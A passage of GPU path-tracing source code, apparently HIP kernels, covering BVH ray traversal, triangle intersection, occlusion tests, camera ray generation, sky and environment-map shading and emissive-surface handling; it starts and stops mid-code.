vertex[1] - o[1]; \ c[2] = vertex[2] - o[2]; \ r[0] = (d[1] * c[2]) - (d[2] * c[1]); \ r[1] = (d[2] * c[0]) - (d[0] * c[2]); \ r[2] = (d[0] * c[1]) - (d[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-d, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ h_u = u; \ h_v = v; \ if (emission > 0.0f) { \ h_material_type = STATE_EMISSIVE; \ } else { \ h_material_type = 
STATE_MATERIAL; \ } \ h_tri_index = ti; \ } \ } \ } \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ ray_state[RS_DIR_X] = d[0]; \ ray_state[RS_DIR_Y] = d[1]; \ ray_state[RS_DIR_Z] = d[2]; \ if (h_tri_index != NO_TRI_HIT) {\ ray_state[RS_STATE] = h_material_type; \ o[0] += d[0] * h_t; \ o[1] += d[1] * h_t; \ o[2] += d[2] * h_t; \ ray_state[RS_ORIGIN_X] = o[0]; \ ray_state[RS_ORIGIN_Y] = o[1]; \ ray_state[RS_ORIGIN_Z] = o[2]; \ ray_state[RS_U] = h_u; \ ray_state[RS_V] = h_v; \ ray_state[RS_HIT_DISTANCE] = h_t; \ ray_state[RS_TRI_INDEX] = h_tri_index; \ } else {\ ray_state[RS_STATE] = STATE_ENVIRONMENT; \ }\ } /// #define OCCLUSION(O, D, USE_NODES_IMAGE, USE_TRIANGLES_IMAGE) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(D[0]); \ id[1] = 1.0f / NOT_ZERO(D[1]); \ id[2] = 1.0f / NOT_ZERO(D[2]); \ ood[0] = O[0] * id[0]; \ ood[1] = O[1] * id[1]; \ ood[2] = O[2] * id[2]; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = 
nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); \ } else { \ vertex[0] = 
triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - O[0]; \ c[1] = vertex[1] - O[1]; \ c[2] = vertex[2] - O[2]; \ r[0] = (D[1] * c[2]) - (D[2] * c[1]); \ r[1] = (D[2] * c[0]) - (D[0] * c[2]); \ r[2] = (D[0] * c[1]) - (D[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-D, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ 
albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ node_offset = TREE_TRAIL_END; \ break; \ } \ } \ } \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ } /// __global__ void Primary(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, Camera camera, uint4 b_seeds, int32_t width, int32_t height, int32_t invert_y, int32_t sample) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float o[3], d[3]; float pixel_sample[2]; PRNG(global_id, b_seeds.x, pixel_sample[0]); PRNG(global_id, b_seeds.y, pixel_sample[1]); int32_t x_pixel = global_id % width; int32_t y_pixel = global_id / width; if (invert_y) { y_pixel = (height - 1) - y_pixel; } float p[3] = { camera.root_pixel[0] + ((x_pixel + pixel_sample[0]) * camera.pixel_offset[0]), camera.root_pixel[1] + ((y_pixel + pixel_sample[1]) * camera.pixel_offset[1]), 1.0f }; p[0] *= camera.focal_depth; p[1] *= camera.focal_depth; p[2] *= camera.focal_depth; float pt[3]; TRANSFORM_X(p, camera.transform, pt); TRANSFORM_Y(p, camera.transform, pt); TRANSFORM_Z(p, camera.transform, pt); float aperture_sample[4]; PRNG(global_id, b_seeds.z, aperture_sample[0]); PRNG(global_id, b_seeds.w, aperture_sample[1]); float aperture_o[3]; CONCENTRIC_HEMI(aperture_sample[0], aperture_sample[1], aperture_o); aperture_o[0] *= camera.aperture_size; aperture_o[1] *= camera.aperture_size; aperture_o[2] = 0.0f; TRANSFORM_X(aperture_o, camera.transform, o); TRANSFORM_Y(aperture_o, camera.transform, o); TRANSFORM_Z(aperture_o, camera.transform, o); d[0] = pt[0] - o[0]; d[1] = pt[1] - o[1]; d[2] = pt[2] - o[2]; NORMALIZE(d); ray_state[RS_THROUGHPUT_R] = 1.0f; ray_state[RS_THROUGHPUT_G] = 1.0f; ray_state[RS_THROUGHPUT_B] = 1.0f; if (sample == 0) { ray_state[RS_COLOR_R] = 0.0f; ray_state[RS_COLOR_G] = 0.0f; ray_state[RS_COLOR_B] = 0.0f; } TRACE(use_nodes_image, use_triangles_image, true); ray_state[RS_LAST_BRDF_PDF] = DIRAC_PDF; return; } /// __global__ void Secondary(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, 
hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int state = ray_state[RS_STATE]; if (state != STATE_SECONDARY) { return; } float o[3], d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; o[0] = ray_state[RS_ORIGIN_X] + (d[0] * EPSILON); o[1] = ray_state[RS_ORIGIN_Y] + (d[1] * EPSILON); o[2] = ray_state[RS_ORIGIN_Z] + (d[2] * EPSILON); TRACE(use_triangles_image, use_nodes_image, false); } /// __global__ void EnvSky(float* ray_state, hipTextureObject_t sun_table, Sun sun, int32_t width, int32_t height, int32_t bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float brdf_pdf = ray_state[RS_LAST_BRDF_PDF]; float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; float s = -6360.5f * d_i[1]; float mu = -s * 0.00015722034f; float nu = d_i[0] * sun.direction[0] + d_i[1] * sun.direction[1] + d_i[2] * sun.direction[2]; float mus = (6360.5f * sun.direction[1]) * 0.00015722034f; float rmu = 6360.5f * mu; float delta = rmu * rmu - 6360.25f; float4 cst; if ((rmu < 0.0f) && (delta > 0.0f)) { cst = make_float4(1.0f, 0.0f, 0.0f, 0.484375f); } else { cst = make_float4(-1.0f, 766800.000001f, 875.67117116f, 0.515625f); } float umu = cst.w + (rmu * cst.x + sqrt(delta + cst.y)) / (79.7511755399f + cst.z) * 0.4921875f; float umus = 0.015625f + (atan(fmax(mus, -0.1975f) * 5.34962349919f) * 0.90909090f + 0.74f) * 0.484375f; float lerp_value = (nu + 1.0f) * 3.5f; float unu = floor(lerp_value); lerp_value = lerp_value - unu; float2 uv0 = make_float2((unu + umus) * 0.125f, umu); float2 uv1 = make_float2((unu + umus + 1.0f) * 0.125f, umu); float4 raymie = fmax((tex2D<float4>(sun_table, uv0.x, uv0.y) * (1.0f - lerp_value)) + (tex2D<float4>(sun_table, uv1.x, uv1.y) * lerp_value), make_float4(0.0f)); float pr = 0.05968310365f * (1.0f + nu * nu); float pm = 0.04297183463f * pow(1.64f - 1.6f * nu, -1.5f) * (1.0f + nu * nu) * 0.378378378f; float4 beta_r = make_float4(0.0058f, 0.0135f, 0.0331f, 1.0f); float4 mie = raymie * raymie.w / (raymie.x) * (beta_r.x / beta_r) * \ (1.0f + (d_i[1] * 3.0f)); float4 result = fmax(raymie * pr + mie * pm, make_float4(0.0f)) * 30.0f * sun.sky_intensity; float sun_delta = sun.direction[0] * d_i[0] + sun.direction[1] * d_i[1] + sun.direction[2] * d_i[2]; float color[3] = { result.x, result.y, result.z }; float mis = 1.0f; if ((brdf_pdf != -1.0f) && (sun_delta >= SUN_COS_THETA)) { float sun_pdf = 1.0f / (TAU * (1.0f - SUN_COS_THETA)); if (bounce > 0) { if (brdf_pdf < DIRAC_PDF) { if (sun.sun_intensity > 0.0f) { mis = MIS(brdf_pdf, sun_pdf); } else { sun.sun_intensity *= 0.05f; } } else { if (bounce > 5) { ray_state[RS_STATE] = STATE_END; return; } sun.sun_intensity *= 0.05f; } } else { sun.sun_intensity *= 0.05f; } float horizon_falloff = fabs(d_i[1] - 0.075f) - (d_i[1] - 0.075f); horizon_falloff = pow(horizon_falloff, 4.0f); float hfo = horizon_falloff * 1000.0f; sun.sun_intensity *= 1.0f + (sun.direction[1] * 4.0f); float multiplier = clamp(1.0f / NOT_ZERO(hfo), 1.0f, fmax(5.0f, sun.sun_intensity * 100.0f)); color[0] *= multiplier; color[1] *= multiplier; color[2] *= multiplier; } else if (bounce > 0) { float horizon_bias = fmin(0.5f, (fmax(0.0f, sun.direction[1] - 0.1f) * 
10.0f)); float max_component = fmax(color[0], fmax(color[1], color[2])); color[0] = lerp(color[0], max_component * 1.0f, horizon_bias); color[1] = lerp(color[1], max_component * 0.98f, horizon_bias); color[2] = lerp(color[2], max_component * 0.73f, horizon_bias); color[0] *= sun.color[0]; color[1] *= sun.color[1]; color[2] *= sun.color[2]; } ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color[0] * mis; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color[1] * mis; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color[2] * mis; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void EnvMap(float* ray_state, hipTextureObject_t environment_map, EnvironmentProperties environment_properties, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_ENVIRONMENT) { return; } float d_i[3]; d_i[0] = ray_state[RS_DIR_X]; d_i[1] = ray_state[RS_DIR_Y]; d_i[2] = ray_state[RS_DIR_Z]; NORMALIZE(d_i); float2 uv = make_float2(1.0f + atan2(d_i[0], -d_i[2]), acos(-d_i[1]) * INV_PI); uv.x *= INV_TAU; uv.x += environment_properties.rotation; float4 color = tex2D<float4>(environment_map, uv.x, uv.y); color.x *= environment_properties.intensity; color.y *= environment_properties.intensity; color.z *= environment_properties.intensity; ray_state[RS_COLOR_R] += ray_state[RS_THROUGHPUT_R] * color.x; ray_state[RS_COLOR_G] += ray_state[RS_THROUGHPUT_G] * color.y; ray_state[RS_COLOR_B] += ray_state[RS_THROUGHPUT_B] * color.z; ray_state[RS_STATE] = STATE_END; return; } /// __global__ void Emission(float* ray_state, Material* materials, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t emission_atlas, int32_t emitter_count, int width, int height, int bounce) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } int32_t state = ray_state[RS_STATE]; if (state != STATE_EMISSIVE) { return; } float d[3]; d[0] = ray_state[RS_DIR_X]; d[1] = ray_state[RS_DIR_Y]; d[2] = ray_state[RS_DIR_Z]; float u = ray_state[RS_U]; float v = ray_state[RS_V]; float w = 1.0f - u - v; int tri_index = ray_state[RS_TRI_INDEX]; uint32_t tri_pixel = tri_index * 42; float vn[3]; if (use_triangles_image) { vn[0] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2); vn[1] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 1); vn[2] = w * tex1Dfetch<float>(triangles_image, TRI_VN_0 + 2) + u * tex1Dfetch<float>(triangles_image, TRI_VN_1 + 2) + v * tex1Dfetch<float>(triangles_image, TRI_VN_2 + 2); } else { vn[0] = w * triangles[tri_index].vertex_normals[0][0] + u * triangles[tri_index].vertex_normals[1][0] + v * triangles[tri_index].vertex_normals[2][0]; vn[1] = w * triangles[tri_index].vertex_normals[0][1] + u * triangles[tri_index].vertex_normals[1][1] + v * triangles[tri_index].vertex_normals[2][1]; vn[2] = w * triangles[tri_index].vertex_normals[0][2] + u * triangles[tri_index].vertex_normals[1][2] + v * triangles[tri_index].vertex_normals[2][2]; } NORMALIZE(vn); float dot_ni = DOT(-d, vn); if (dot_ni <= 0.0f) { ray_state[RS_STATE] = STATE_END; return; } else { uint mat_id; float uv[2]; float inverse_area; if (use_triangles_image) { mat_id = 
tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); uv[0] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2); uv[1] = w * tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1) + u * tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1) + v * tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); inverse_area = tex1Dfetch<float>(triangles_image, TRI_INV_AREA); } else { mat_id = triangles[tri_index].material_id; uv[0] = w * triangles[tri_index].vertex_uvs[0][0] + u * triangles[tri_index].vertex_uvs[1][0] + v * triangles[tri_index].vertex_uvs[2][0]; uv[1] = w * triangles[tri_index].vertex_uvs[0][1] + u * triangles[tri_index].vertex_uvs[1][1] + v * triangles[tri_index].vertex_uvs[2][1]; inverse_area = triangles[tri_index].inverse_area; } float t = ray_state[RS_HIT_DISTANCE]; float t_2 = t * t; float emitter_color[3]; float intensity = materials[mat_id].emission * 25.0f; if 